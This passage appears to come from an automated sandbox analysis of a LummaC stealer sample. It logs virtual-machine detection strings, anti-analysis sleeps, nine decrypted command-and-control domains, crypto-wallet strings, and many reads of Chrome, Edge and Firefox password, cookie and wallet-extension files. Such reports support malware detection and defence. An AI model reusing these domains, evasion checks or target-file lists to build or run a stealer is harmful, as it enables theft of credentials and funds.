Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 7004	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7004	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: file.exe, 00000000.00000002.1890474454.0000000001A9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000003.1664402054.0000000001ACB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890474454.0000000001AC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00435C40 LdrInitializeThunk,

0_2_00435C40

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01A6FE7B push dword ptr fs:[00000030h]	0_2_01A6FE7B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0368092B mov eax, dword ptr fs:[00000030h]	0_2_0368092B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_03680D90 mov eax, dword ptr fs:[00000030h]	0_2_03680D90

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: file.exe	String found in binary or memory: demonstationfukewko.shop
Source: file.exe	String found in binary or memory: liabilitynighstjsko.shop
Source: file.exe	String found in binary or memory: alcojoldwograpciw.shop
Source: file.exe	String found in binary or memory: incredibleextedwj.shop
Source: file.exe	String found in binary or memory: shortsvelventysjo.shop
Source: file.exe	String found in binary or memory: shatterbreathepsw.shop
Source: file.exe	String found in binary or memory: tolerateilusidjukl.shop
Source: file.exe	String found in binary or memory: productivelookewr.shop
Source: file.exe	String found in binary or memory: strollheavengwu.shop

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: file.exe, 00000000.00000002.1891047135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1713248842.0000000004205000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: file.exe, 00000000.00000003.1713248842.0000000004205000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Defender\MsMpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 4192, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.1890474454.0000000001AC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: file.exe, 00000000.00000003.1691971888.0000000001B31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Libertyt
Source: file.exe, 00000000.00000002.1890474454.0000000001AC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000002.1890474454.0000000001AC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe, 00000000.00000002.1890474454.0000000001B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: file.exe, 00000000.00000002.1890474454.0000000001AC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: file.exe, 00000000.00000002.1890474454.0000000001B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000002.1890474454.0000000001B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
